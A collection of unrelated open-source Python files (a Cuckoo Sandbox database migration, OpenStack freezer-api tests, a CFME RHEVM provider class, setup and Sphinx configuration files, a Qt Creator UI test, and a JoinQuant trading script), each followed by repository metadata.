            d["target"] = item[1]
            d["category"] = item[2]
            d["timeout"] = item[3]
            d["priority"] = item[4]
            d["custom"] = item[5]
            d["machine"] = item[6]
            d["package"] = item[7]
            d["options"] = item[8]
            d["platform"] = item[9]
            d["memory"] = item[10]
            d["enforce_timeout"] = item[11]
            # Datetime columns may come back as datetime objects or as
            # strings depending on the driver; normalise via dateutil.
            if isinstance(item[12], datetime):
                d["clock"] = item[12]
            elif item[12]:
                d["clock"] = parse(item[12])
            else:
                d["clock"] = None
            if isinstance(item[13], datetime):
                d["added_on"] = item[13]
            elif item[13]:
                d["added_on"] = parse(item[13])
            else:
                d["added_on"] = None
            if isinstance(item[14], datetime):
                d["started_on"] = item[14]
            elif item[14]:
                d["started_on"] = parse(item[14])
            else:
                d["started_on"] = None
            if isinstance(item[15], datetime):
                d["completed_on"] = item[15]
            elif item[15]:
                d["completed_on"] = parse(item[15])
            else:
                d["completed_on"] = None
            d["status"] = item[16]
            d["sample_id"] = item[17]
            tasks_data.append(d)
        if conn.engine.driver == "mysqldb":
            # Disable foreign key checking to migrate table avoiding checks.
            op.execute('SET foreign_key_checks = 0')
            # Drop old table.
            op.drop_table("tasks")
            # Drop old Enum.
            sa.Enum(name="status_type").drop(op.get_bind(), checkfirst=False)
            # Create table with 1.2 schema.
            op.create_table(
                "tasks",
                sa.Column("id", sa.Integer(), nullable=False),
                sa.Column("target", sa.String(length=255), nullable=False),
                sa.Column("category", sa.String(length=255), nullable=False),
                sa.Column("timeout", sa.Integer(), server_default="0", nullable=False),
                sa.Column("priority", sa.Integer(), server_default="1", nullable=False),
                sa.Column("custom", sa.String(length=255), nullable=True),
                sa.Column("machine", sa.String(length=255), nullable=True),
                sa.Column("package", sa.String(length=255), nullable=True),
                sa.Column("options", sa.String(length=255), nullable=True),
                sa.Column("platform", sa.String(length=255), nullable=True),
                sa.Column("memory", sa.Boolean(), nullable=False, default=False),
                sa.Column("enforce_timeout", sa.Boolean(), nullable=False, default=False),
                sa.Column("clock", sa.DateTime(timezone=False), default=datetime.now, nullable=False),
                sa.Column("added_on", sa.DateTime(timezone=False), nullable=False),
                sa.Column("started_on", sa.DateTime(timezone=False), nullable=True),
                sa.Column("completed_on", sa.DateTime(timezone=False), nullable=True),
                sa.Column("status", sa.Enum("pending", "running", "completed", "reported", "recovered", "failed_analysis", "failed_processing", "failed_reporting", name="status_type"), server_default="pending", nullable=False),
                sa.Column("sample_id", sa.Integer, sa.ForeignKey("samples.id"), nullable=True),
                sa.PrimaryKeyConstraint("id")
            )
            op.execute('COMMIT')
            # Insert data.
            op.bulk_insert(db.Task.__table__, tasks_data)
            # Enable foreign key.
            op.execute('SET foreign_key_checks = 1')
        else:
            # SQLite (and anything else): plain drop/recreate, no FK toggling.
            op.drop_table("tasks")
            # Create table with 1.2 schema.
            op.create_table(
                "tasks",
                sa.Column("id", sa.Integer(), nullable=False),
                sa.Column("target", sa.String(length=255), nullable=False),
                sa.Column("category", sa.String(length=255), nullable=False),
                sa.Column("timeout", sa.Integer(), server_default="0", nullable=False),
                sa.Column("priority", sa.Integer(), server_default="1", nullable=False),
                sa.Column("custom", sa.String(length=255), nullable=True),
                sa.Column("machine", sa.String(length=255), nullable=True),
                sa.Column("package", sa.String(length=255), nullable=True),
                sa.Column("options", sa.String(length=255), nullable=True),
                sa.Column("platform", sa.String(length=255), nullable=True),
                sa.Column("memory", sa.Boolean(), nullable=False, default=False),
                sa.Column("enforce_timeout", sa.Boolean(), nullable=False, default=False),
                sa.Column("clock", sa.DateTime(timezone=False), default=datetime.now, nullable=False),
                sa.Column("added_on", sa.DateTime(timezone=False), nullable=False),
                sa.Column("started_on", sa.DateTime(timezone=False), nullable=True),
                sa.Column("completed_on", sa.DateTime(timezone=False), nullable=True),
                sa.Column("status", sa.Enum("pending", "running", "completed", "reported", "recovered", "failed_analysis", "failed_processing", "failed_reporting", name="status_type"), server_default="pending", nullable=False),
                sa.Column("sample_id", sa.Integer, sa.ForeignKey("samples.id"), nullable=True),
                sa.PrimaryKeyConstraint("id")
            )
            # Insert data.
            op.bulk_insert(db.Task.__table__, tasks_data)
def downgrade():
    """No-op: this migration provides no downgrade path."""
    pass
| cuckoobox/cuckoo | cuckoo/private/db_migration/versions/from_1_1_to_1_2-added_states.py | Python | mit | 7,228 | 0.004289 |
# (c) Copyright 2018 ZTE Corporation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests for manipulating Action via the DB API"""
import copy
from unittest import mock
from unittest.mock import patch
from freezer_api.common import exceptions as freezer_api_exc
from freezer_api.tests.unit import common
from freezer_api.tests.unit.sqlalchemy import base
class DbActionTestCase(base.DbTestCase):
def setUp(self):
super(DbActionTestCase, self).setUp()
self.fake_action_0 = common.get_fake_action_0()
self.fake_action_2 = common.get_fake_action_2()
self.fake_action_3 = common.get_fake_action_3()
self.freezer_action_0 = self.fake_action_0.get('freezer_action')
self.freezer_action_2 = self.fake_action_2.get('freezer_action')
self.fake_project_id = self.fake_action_0.get('project_id')
self.fake_user_id = self.fake_action_0.get('user_id')
self.fake_action_id = common.get_fake_action_id()
def test_add_and_get_action(self):
action_doc = copy.deepcopy(self.fake_action_0)
action_id = self.dbapi.add_action(user_id=self.fake_action_0.
get('user_id'),
doc=action_doc,
project_id=self.fake_project_id)
self.assertIsNotNone(action_id)
result = self.dbapi.get_action(project_id=self.fake_project_id,
user_id=self.fake_action_0.
get('user_id'),
action_id=action_id)
self.assertIsNotNone(result)
self.assertEqual(result.get('max_retries'),
self.fake_action_0.get('max_retries'))
self.assertEqual(result.get('max_retries_interval'),
self.fake_action_0.get('max_retries_interval'))
freezer_action = result.get('freezer_action')
self.assertEqual(freezer_action.get('action'),
self.freezer_action_0.get('action'))
self.assertEqual(freezer_action.get('backup_name'),
self.freezer_action_0.get('backup_name'))
self.assertEqual(freezer_action.get('container'),
self.freezer_action_0.get('container'))
self.assertEqual(freezer_action.get('path_to_backup'),
self.freezer_action_0.get('path_to_backup'))
self.assertEqual(freezer_action.get('mode'),
self.freezer_action_0.get('mode'))
def test_add_and_delete_action(self):
action_doc = copy.deepcopy(self.fake_action_0)
action_id = self.dbapi.add_action(user_id=self.fake_action_0.
get('user_id'),
doc=action_doc,
project_id=self.fake_project_id)
self.assertIsNotNone(action_id)
result = self.dbapi.delete_action(project_id=self.fake_project_id,
user_id=self.fake_action_0.
get('user_id'),
action_id=action_id)
self.assertIsNotNone(result)
self.assertEqual(result, action_id)
result = self.dbapi.get_action(project_id=self.fake_project_id,
user_id=self.fake_action_0.
get('user_id'),
action_id=action_id)
self.assertEqual(len(result), 0)
def test_add_and_update_action(self):
action_doc = copy.deepcopy(self.fake_action_0)
action_id = self.dbapi.add_action(user_id=self.fake_action_0.
get('user_id'),
doc=action_doc,
project_id=self.fake_project_id)
self.assertIsNotNone(action_id)
patch_doc = copy.deepcopy(self.fake_action_2)
result = self.dbapi.update_action(project_id=self.fake_project_id,
user_id=self.fake_action_2.
get('user_id'),
patch_doc=patch_doc,
action_id=action_id)
self.assertIsNotNone(result)
self.assertEqual(result, action_id)
result = self.dbapi.get_action(project_id=self.fake_project_id,
user_id=self.fake_action_2.
get('user_id'),
action_id=action_id)
self.assertEqual(result.get('max_retries'),
self.fake_action_2.get('max_retries'))
self.assertEqual(result.get('max_retries_interval'),
self.fake_action_2.get('max_retries_interval'))
freezer_action = result.get('freezer_action')
self.assertEqual(freezer_action.get('action'),
self.freezer_action_2.get('action'))
def test_add_and_replace_action(self):
action_doc = copy.deepcopy(self.fake_action_0)
action_id = self.dbapi.add_action(user_id=self.fake_action_0.
get('user_id'),
doc=action_doc,
project_id=self.fake_project_id)
self.assertIsNotNone(action_id)
patch_doc = copy.deepcopy(self.fake_action_2)
result = self.dbapi.replace_action(project_id=self.fake_project_id,
user_id=self.fake_action_2.
get('user_id'),
doc=patch_doc,
action_id=action_id)
self.assertIsNotNone(result)
self.assertEqual(result, action_id)
result = self.dbapi.get_action(project_id=self.fake_project_id,
user_id=self.fake_action_2.
get('user_id'),
action_id=action_id)
self.assertEqual(result.get('max_retries'),
self.fake_action_2.get('max_retries'))
self.assertEqual(result.get('max_retries_interval'),
self.fake_action_2.get('max_retries_interval'))
freezer_action = result.get('freezer_action')
self.assertEqual(freezer_action.get('action'),
self.freezer_action_2.get('action'))
patch_doc1 = copy.deepcopy(self.fake_action_0)
result = self.dbapi.replace_action(project_id=self.fake_project_id,
user_id=self.fake_action_2.
get('user_id'),
doc=patch_doc1,
action_id=self.fake_action_id)
self.assertIsNotNone(result)
result = self.dbapi.get_action(project_id=self.fake_project_id,
user_id=self.fake_action_2.
get('user_id'),
action_id=self.fake_action_id)
self.assertEqual(result.get('action_id'), self.fake_action_id)
def test_add_and_search_action(self):
count = 0
actionids = []
while(count < 20):
doc = copy.deepcopy(self.fake_action_3)
action_id = common.get_fake_action_id()
doc['action_id'] = action_id
result = self.dbapi.add_action(user_id=self.fake_action_3.
get('user_id'),
doc=doc,
project_id=self.fake_project_id)
self.assertIsNotNone(result)
self.assertEqual(result, action_id)
actionids.append(action_id)
count += 1
result = self.dbapi.search_action(project_id=self.fake_project_id,
user_id=self.fake_action_3.
get('user_id'),
limit=10,
offset=0)
self.assertIsNotNone(result)
self.assertEqual(len(result), 10)
for index in range(len(result)):
actionmap = result[index]
self.assertEqual(actionids[index], actionmap['action_id'])
def test_action_list_with_search_match_and_match_not(self):
count = 0
actionids = []
while (count < 20):
doc = copy.deepcopy(self.fake_action_3)
action_id = common.get_fake_action_id()
doc['action_id'] = action_id
if count in [0, 4, 8, 12, 16]:
doc['max_retries'] = 10
if count in [4, 12]:
doc['freezer_action']['mode'] = 'nova'
result = self.dbapi.add_action(user_id=self.fake_action_3.
get('user_id'),
doc=doc,
project_id=self.fake_project_id)
self.assertIsNotNone(result)
self.assertEqual(result, action_id)
actionids.append(action_id)
count += 1
search_opt = {'match_not': [{'mode': 'nova'}],
'match': [{'max_retries': 10}]}
result = self.dbapi.search_action(project_id=self.fake_project_id,
user_id=self.fake_action_3.
get('user_id'),
limit=20,
offset=0,
search=search_opt)
self.assertIsNotNone(result)
self.assertEqual(len(result), 3)
for index in range(len(result)):
actionmap = result[index]
self.assertEqual(10, actionmap['max_retries'])
self.assertEqual('fs',
actionmap['freezer_action']['mode'])
def test_action_list_with_search_match_list(self):
count = 0
actionids = []
while (count < 20):
doc = copy.deepcopy(self.fake_action_3)
action_id = common.get_fake_action_id()
doc['action_id'] = action_id
if count in [0, 4, 8, 12, 16]:
doc['max_retries'] = 10
if count in [4, 12]:
doc['freezer_action']['mode'] = 'nova'
result = self.dbapi.add_action(user_id=self.fake_action_3.
get('user_id'),
doc=doc,
project_id=self.fake_project_id)
self.assertIsNotNone(result)
self.assertEqual(result, action_id)
actionids.append(action_id)
count += 1
search_opt = {'match': [{'max_retries': 10},
{'mode': 'nova'}]}
result = self.dbapi.search_action(project_id=self.fake_project_id,
user_id=self.fake_action_3.
get('user_id'),
limit=20,
offset=0,
search=search_opt)
self.assertIsNotNone(result)
self.assertEqual(len(result), 2)
for index in range(len(result)):
actionmap = result[index]
self.assertEqual(10, actionmap['max_retries'])
self.assertEqual('nova',
actionmap['freezer_action']['mode'])
def test_action_list_with_search_match_not_list(self):
count = 0
actionids = []
while (count < 20):
doc = copy.deepcopy(self.fake_action_3)
action_id = common.get_fake_action_id()
doc['action_id'] = action_id
if count in [0, 4, 8, 12, 16]:
doc['max_retries'] = 10
if count in [4, 12]:
doc['freezer_action']['mode'] = 'nova'
result = self.dbapi.add_action(user_id=self.fake_action_3.
get('user_id'),
doc=doc,
project_id=self.fake_project_id)
self.assertIsNotNone(result)
self.assertEqual(result, action_id)
actionids.append(action_id)
count += 1
search_opt = {'match_not':
[{'mode': 'nova'},
{'max_retries': 5}]}
result = self.dbapi.search_action(project_id=self.fake_project_id,
user_id=self.fake_action_3.
get('user_id'),
limit=20,
offset=0,
search=search_opt)
self.assertIsNotNone(result)
self.assertEqual(len(result), 3)
for index in range(len(result)):
actionmap = result[index]
self.assertEqual(10, actionmap['max_retries'])
self.assertEqual('fs',
actionmap['freezer_action']['mode'])
def test_action_list_with_search_with_all_opt_one_match(self):
count = 0
actionids = []
while (count < 20):
doc = copy.deepcopy(self.fake_action_3)
action_id = common.get_fake_action_id()
doc['action_id'] = action_id
if count in [0, 4, 8, 12, 16]:
doc['max_retries'] = 10
result = self.dbapi.add_action(user_id=self.fake_action_3.
get('user_id'),
doc=doc,
project_id=self.fake_project_id)
self.assertIsNotNone(result)
self.assertEqual(result, action_id)
actionids.append(action_id)
count += 1
search_opt = {'match': [{'_all': '[{"max_retries": 10}]'}]}
result = self.dbapi.search_action(project_id=self.fake_project_id,
user_id=self.fake_action_3.
get('user_id'),
limit=20,
offset=0,
search=search_opt)
self.assertIsNotNone(result)
self.assertEqual(len(result), 5)
for index in range(len(result)):
actionmap = result[index]
self.assertEqual(10, actionmap['max_retries'])
def test_action_list_with_search_with_all_opt_two_matchs(self):
count = 0
actionids = []
while (count < 20):
doc = copy.deepcopy(self.fake_action_3)
action_id = common.get_fake_action_id()
doc['action_id'] = action_id
if count in [0, 4, 8, 12, 16]:
doc['max_retries'] = 10
if count in [4, 12]:
doc['freezer_action']['mode'] = 'nova'
result = self.dbapi.add_action(user_id=self.fake_action_3.
get('user_id'),
doc=doc,
project_id=self.fake_project_id)
self.assertIsNotNone(result)
self.assertEqual(result, action_id)
actionids.append(action_id)
count += 1
search_opt = {'match':
[{'_all':
'[{"max_retries": 10}, '
'{"mode": "nova"}]'}]}
result = self.dbapi.search_action(project_id=self.fake_project_id,
user_id=self.fake_action_3.
get('user_id'),
limit=20,
offset=0,
search=search_opt)
self.assertIsNotNone(result)
self.assertEqual(len(result), 2)
for index in range(len(result)):
actionmap = result[index]
self.assertEqual(10, actionmap['max_retries'])
self.assertEqual('nova',
actionmap['freezer_action']['mode'])
def test_action_list_with_search_with_error_all_opt_return_alltuples(self):
count = 0
actionids = []
while (count < 20):
doc = copy.deepcopy(self.fake_action_3)
action_id = common.get_fake_action_id()
doc['action_id'] = action_id
if count in [0, 4, 8, 12, 16]:
doc['max_retries'] = 10
result = self.dbapi.add_action(user_id=self.fake_action_3.
get('user_id'),
doc=doc,
project_id=self.fake_project_id)
self.assertIsNotNone(result)
self.assertEqual(result, action_id)
actionids.append(action_id)
count += 1
search_opt = {'match': [{'_all': '{"max_retries": 10}'}]}
result = self.dbapi.search_action(project_id=self.fake_project_id,
user_id=self.fake_action_3.
get('user_id'),
limit=20,
offset=0,
search=search_opt)
self.assertIsNotNone(result)
self.assertEqual(len(result), 20)
search_opt = {'match': [{'_all': 'max_retries=10'}]}
result = self.dbapi.search_action(project_id=self.fake_project_id,
user_id=self.fake_action_3.
get('user_id'),
limit=20,
offset=0,
search=search_opt)
self.assertIsNotNone(result)
self.assertEqual(len(result), 20)
    # get_action is patched to pretend the action already exists in the DB.
    @patch('freezer_api.db.sqlalchemy.api.get_action')
    def test_raise_add_action(self, mock_get_action):
        """add_action must raise DocumentExists for a duplicate action id."""
        mock_get_action.return_value = mock.MagicMock()
        self.assertRaises(freezer_api_exc.DocumentExists,
                          self.dbapi.add_action, self.fake_user_id,
                          self.fake_action_0,
                          project_id=self.fake_project_id)
| openstack/freezer-api | freezer_api/tests/unit/sqlalchemy/v2/test_action.py | Python | apache-2.0 | 19,604 | 0 |
import attr
from widgetastic.widget import View, Text
from widgetastic_patternfly import Tab, Input, BootstrapSwitch, Button
from wrapanapi.rhevm import RHEVMSystem
from cfme.common.candu_views import VMUtilizationView
from cfme.common.provider import CANDUEndpoint, DefaultEndpoint, DefaultEndpointForm
from cfme.common.provider_views import BeforeFillMixin
from cfme.exceptions import ItemNotFound
from cfme.services.catalogs.catalog_items import RHVCatalogItem
from cfme.utils import version
from widgetastic_manageiq import LineChart
from . import InfraProvider
class RHEVMEndpoint(DefaultEndpoint):
    """'Default' API endpoint of a RHV provider (the RHV-M engine)."""
    @property
    def view_value_mapping(self):
        """Form-fill values for the endpoint widgets.

        The TLS verification widgets only exist on appliance versions
        >= 5.8.0.8, so for older versions ``version.pick`` maps them to
        None (meaning "do not fill this widget").
        """
        tls_since_version = '5.8.0.8'
        return {'hostname': self.hostname,
                'api_port': getattr(self, 'api_port', None),
                'verify_tls': version.pick({
                    version.LOWEST: None,
                    tls_since_version: getattr(self, 'verify_tls', None)}),
                'ca_certs': version.pick({
                    version.LOWEST: None,
                    tls_since_version: getattr(self, 'ca_certs', None)})
                }
class RHEVMEndpointForm(View):
    """Endpoint tabs of the RHV provider add/edit dialog."""
    @View.nested
    class default(Tab, DefaultEndpointForm, BeforeFillMixin):  # NOQA
        """'Default' tab: the RHV-M API endpoint."""
        TAB_NAME = 'Default'
        api_port = Input('default_api_port')
        verify_tls = BootstrapSwitch(id='default_tls_verify')
        ca_certs = Input('default_tls_ca_certs')

    @View.nested
    class candu(Tab, BeforeFillMixin):  # NOQA
        """'C & U Database' tab: the metrics (Capacity & Utilization) DB."""
        TAB_NAME = 'C & U Database'
        hostname = Input('metrics_hostname')
        api_port = Input('metrics_api_port')
        database_name = Input('metrics_database_name')
        username = Input('metrics_userid')
        password = Input('metrics_password')
        confirm_password = Input('metrics_verify')
        change_password = Text(locator='.//a[normalize-space(.)="Change stored password"]')

        validate = Button('Validate')
class RHEVMVMUtilizationView(VMUtilizationView):
    """A VM Utilization view for rhevm providers"""
    # C&U line charts, in the order they appear on the utilization page.
    vm_cpu = LineChart(id='miq_chart_parent_candu_0')
    vm_memory = LineChart(id='miq_chart_parent_candu_1')
    vm_disk = LineChart(id='miq_chart_parent_candu_2')
    vm_network = LineChart(id='miq_chart_parent_candu_3')
@attr.s(hash=False)
class RHEVMProvider(InfraProvider):
    """Red Hat Virtualization (RHV / RHEV-M) infrastructure provider."""
    catalog_item_type = RHVCatalogItem
    vm_utilization_view = RHEVMVMUtilizationView
    type_name = "rhevm"
    mgmt_class = RHEVMSystem
    db_types = ["Redhat::InfraManager"]
    endpoints_form = RHEVMEndpointForm
    discover_dict = {"rhevm": True}
    settings_key = 'ems_redhat'
    # xpath locators for elements, to be used by selenium
    _console_connection_status_element = '//*[@id="connection-status"]|//*[@id="message-div"]'
    _canvas_element = '(//*[@id="remote-console"]/canvas|//*[@id="spice-screen"]/canvas)'
    _ctrl_alt_del_xpath = '//*[@id="ctrlaltdel"]'
    _fullscreen_xpath = '//*[@id="fullscreen"]'
    bad_credentials_error_msg = "Credential validation was not successful"
    # (event name, expected event attributes) pairs used by event testing.
    ems_events = [
        ('vm_create', {'event_type': 'USER_ADD_VM_FINISHED_SUCCESS', 'vm_or_template_id': None}),
        ('vm_stop', {'event_type': 'USER_STOP_VM', 'vm_or_template_id': None}),
        ('vm_start', {'event_type': 'USER_RUN_VM', 'vm_or_template_id': None}),
        ('vm_delete', {'event_type': 'USER_REMOVE_VM_FINISHED', 'vm_or_template_id': None})
    ]

    @property
    def view_value_mapping(self):
        """Values used to fill the provider add/edit form."""
        return {
            'name': self.name,
            'prov_type': 'Red Hat Virtualization'
        }

    def deployment_helper(self, deploy_args):
        """Used in utils.virtual_machines.

        Falls back to the provider's configured default cluster when the
        caller did not specify one.
        """
        if 'default_cluster' not in deploy_args:
            return {'cluster': self.data['default_cluster']}
        return {}

    @classmethod
    def from_config(cls, prov_config, prov_key):
        """Instantiate the provider from a cfme_data-style config dict."""
        endpoints = {}
        for endp in prov_config['endpoints']:
            for expected_endpoint in (RHEVMEndpoint, CANDUEndpoint):
                if expected_endpoint.name == endp:
                    endpoints[endp] = expected_endpoint(**prov_config['endpoints'][endp])

        if prov_config.get('discovery_range'):
            start_ip = prov_config['discovery_range']['start']
            end_ip = prov_config['discovery_range']['end']
        else:
            start_ip = end_ip = prov_config.get('ipaddress')
        return cls.appliance.collections.infra_providers.instantiate(
            prov_class=cls,
            name=prov_config['name'],
            endpoints=endpoints,
            zone=prov_config.get('server_zone', 'default'),
            key=prov_key,
            start_ip=start_ip,
            end_ip=end_ip)

    # Following methods will only work if the remote console window is open
    # and if selenium focused on it. These will not work if the selenium is
    # focused on Appliance window.
    def _find_console_element(self, xpath):
        """Locate ``xpath`` in the remote console window or raise ItemNotFound.

        The four public getters below previously each had their own copy of
        this lookup, guarded by a bare ``except:`` that also swallowed
        SystemExit/KeyboardInterrupt; the clause is narrowed to Exception.
        """
        try:
            return self.appliance.browser.widgetastic.selenium.find_element_by_xpath(xpath)
        except Exception:
            raise ItemNotFound("Element not found on screen, is current focus on console window?")

    def get_console_connection_status(self):
        """Return the text of the console connection status element."""
        return self._find_console_element(self._console_connection_status_element).text

    def get_remote_console_canvas(self):
        """Return the remote console canvas element."""
        return self._find_console_element(self._canvas_element)

    def get_console_ctrl_alt_del_btn(self):
        """Return the console's Ctrl+Alt+Del button element."""
        return self._find_console_element(self._ctrl_alt_del_xpath)

    def get_console_fullscreen_btn(self):
        """Return the console's fullscreen toggle button element."""
        return self._find_console_element(self._fullscreen_xpath)
| lkhomenk/integration_tests | cfme/infrastructure/provider/rhevm.py | Python | gpl-2.0 | 6,107 | 0.003111 |
#!/usr/bin/env python3
from distutils.core import setup
from catkin_pkg.python_setup import generate_distutils_setup
# Build the setup() arguments from package.xml (standard catkin convention
# for ROS Python packages); the code lives under src/lg_keyboard.
d = generate_distutils_setup(
    packages=['lg_keyboard'],
    package_dir={'': 'src'},
    scripts=[],
    requires=[]
)

setup(**d)
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
| EndPointCorp/lg_ros_nodes | lg_keyboard/setup.py | Python | apache-2.0 | 309 | 0 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# clamm documentation build configuration file, created by
# sphinx-quickstart on Thu Mar 2 20:47:20 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
# Make the package importable so sphinx.ext.autodoc can find clamm modules.
sys.path.insert(0, os.path.abspath('../clamm'))

# -- General configuration ------------------------------------------------

# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'

# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
    'sphinx.ext.autodoc',
    'sphinx.ext.coverage',
    'sphinx.ext.napoleon']

# Docstrings follow the NumPy convention (parsed by napoleon).
napoleon_numpy_docstring = True

# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']

# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'

# The master toctree document.
master_doc = 'index'

# General information about the project.
project = 'clamm'
copyright = '2017, Paul Adams'
author = 'Paul Adams'

# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'

# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None

# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']

# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'

# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False


# -- Options for HTML output ----------------------------------------------

# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'

# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}

# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']


# -- Options for HTMLHelp output ------------------------------------------

# Output file base name for HTML help builder.
htmlhelp_basename = 'clammdoc'


# -- Options for LaTeX output ---------------------------------------------

latex_elements = {
    # The paper size ('letterpaper' or 'a4paper').
    #
    # 'papersize': 'letterpaper',

    # The font size ('10pt', '11pt' or '12pt').
    #
    # 'pointsize': '10pt',

    # Additional stuff for the LaTeX preamble.
    #
    # 'preamble': '',

    # Latex figure (float) alignment
    #
    # 'figure_align': 'htbp',
}

# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
#  author, documentclass [howto, manual, or own class]).
latex_documents = [
    (master_doc, 'clamm.tex', 'clamm Documentation',
     'Paul Adams', 'manual'),
]


# -- Options for manual page output ---------------------------------------

# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
    (master_doc, 'clamm', 'clamm Documentation',
     [author], 1)
]


# -- Options for Texinfo output -------------------------------------------

# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
#  dir menu entry, description, category)
texinfo_documents = [
    (master_doc, 'clamm', 'clamm Documentation',
     author, 'clamm', 'One line description of project.',
     'Miscellaneous'),
]
| p5a0u9l/clamm | doc/conf.py | Python | mit | 4,816 | 0.000208 |
#############################################################################
##
## Copyright (C) 2015 The Qt Company Ltd.
## Contact: http://www.qt.io/licensing
##
## This file is part of Qt Creator.
##
## Commercial License Usage
## Licensees holding valid commercial Qt licenses may use this file in
## accordance with the commercial license agreement provided with the
## Software or, alternatively, in accordance with the terms contained in
## a written agreement between you and The Qt Company. For licensing terms and
## conditions see http://www.qt.io/terms-conditions. For further information
## use the contact form at http://www.qt.io/contact-us.
##
## GNU Lesser General Public License Usage
## Alternatively, this file may be used under the terms of the GNU Lesser
## General Public License version 2.1 or version 3 as published by the Free
## Software Foundation and appearing in the file LICENSE.LGPLv21 and
## LICENSE.LGPLv3 included in the packaging of this file. Please review the
## following information to ensure the GNU Lesser General Public License
## requirements will be met: https://www.gnu.org/licenses/lgpl.html and
## http://www.gnu.org/licenses/old-licenses/lgpl-2.1.html.
##
## In addition, as a special exception, The Qt Company gives you certain additional
## rights. These rights are described in The Qt Company LGPL Exception
## version 1.1, included in the file LGPL_EXCEPTION.txt in this package.
##
#############################################################################
source("../../shared/qtcreator.py")

import re

# Absolute path to speedcrunch.pro; filled in by the init() hook below.
SpeedCrunchPath = ""
def buildConfigFromFancyToolButton(fancyToolButton):
    """Extract the active build configuration name from the tool button's
    HTML tooltip (the text between the 'Build:' and 'Deploy:' labels)."""
    tip = str(fancyToolButton.toolTip)
    startMarker = "<b>Build:</b> "
    endMarker = "<br/><b>Deploy:</b>"
    start = tip.find(startMarker) + len(startMarker)
    return tip[start:tip.find(endMarker)]
def main():
    """Open the SpeedCrunch project and rebuild every Release config.

    Squish test entry point: relies on globals provided by
    shared/qtcreator.py (startApplication, openQmakeProject, ...).
    """
    if not neededFilePresent(SpeedCrunchPath):
        return
    startApplication("qtcreator" + SettingsPath)
    if not startedWithoutPluginError():
        return
    # Pick the kits this test can build with; MSVC2010 only on Windows.
    suitableKits = Targets.DESKTOP_480_GCC
    if platform.system() in ('Windows', 'Microsoft'):
        suitableKits |= Targets.DESKTOP_480_MSVC2010
    checkedTargets = openQmakeProject(SpeedCrunchPath, suitableKits)
    progressBarWait(30000)
    fancyToolButton = waitForObject(":*Qt Creator_Core::Internal::FancyToolButton")
    availableConfigs = iterateBuildConfigs(len(checkedTargets), "Release")
    if not availableConfigs:
        test.fatal("Haven't found a suitable Qt version (need Release build) - leaving without building.")
    for kit, config in availableConfigs:
        selectBuildConfig(len(checkedTargets), kit, config)
        # Cross-check that the UI actually switched to the requested config.
        buildConfig = buildConfigFromFancyToolButton(fancyToolButton)
        if buildConfig != config:
            test.fatal("Build configuration %s is selected instead of %s" % (buildConfig, config))
            continue
        test.log("Testing build configuration: " + config)
        if not JIRA.isBugStillOpen(13700):
            invokeMenuItem("Build", "Run qmake")
            waitForCompile()
        invokeMenuItem("Build", "Rebuild All")
        waitForCompile(300000)
        checkCompile()
        checkLastBuild()
    # Add a new run configuration

    invokeMenuItem("File", "Exit")
def init():
    """Squish hook run before main(): locate the project, clean leftovers."""
    global SpeedCrunchPath
    SpeedCrunchPath = os.path.join(srcPath, "creator-test-data", "speedcrunch", "src", "speedcrunch.pro")
    cleanup()
def cleanup():
    """Squish hook run after main(): drop .user files and build directories."""
    # Make sure the .user files are gone
    cleanUpUserFiles(SpeedCrunchPath)
    for dir in glob.glob(os.path.join(srcPath, "creator-test-data", "speedcrunch", "speedcrunch-build-*")):
        deleteDirIfExists(dir)
| kuba1/qtcreator | tests/system/suite_general/tst_build_speedcrunch/test.py | Python | lgpl-2.1 | 3,768 | 0.008493 |
import shipane_sdk
# 初始化函数,设定要操作的股票、基准等等
def initialize(context):
# 定义一个全局变量, 保存要操作的股票
# 000001(股票:平安银行)
g.security = '000001.XSHE'
# 设定沪深300作为基准
set_benchmark('000300.XSHG')
def process_initialize(context):
    # Create the StrategyManager object.
    # The argument is the manager id from the configuration file.
    g.__manager = shipane_sdk.JoinQuantStrategyManagerFactory(context).create('manager-1')
# Called once per unit of time (once per day when backtesting daily,
# once per minute when backtesting by minute).
def handle_data(context, data):
    # Keep the order object returned by the platform.
    order_ = order(g.security, 100)
    # The live-trading bridge places the real order based on JoinQuant's
    # order object.
    g.__manager.execute(order_)
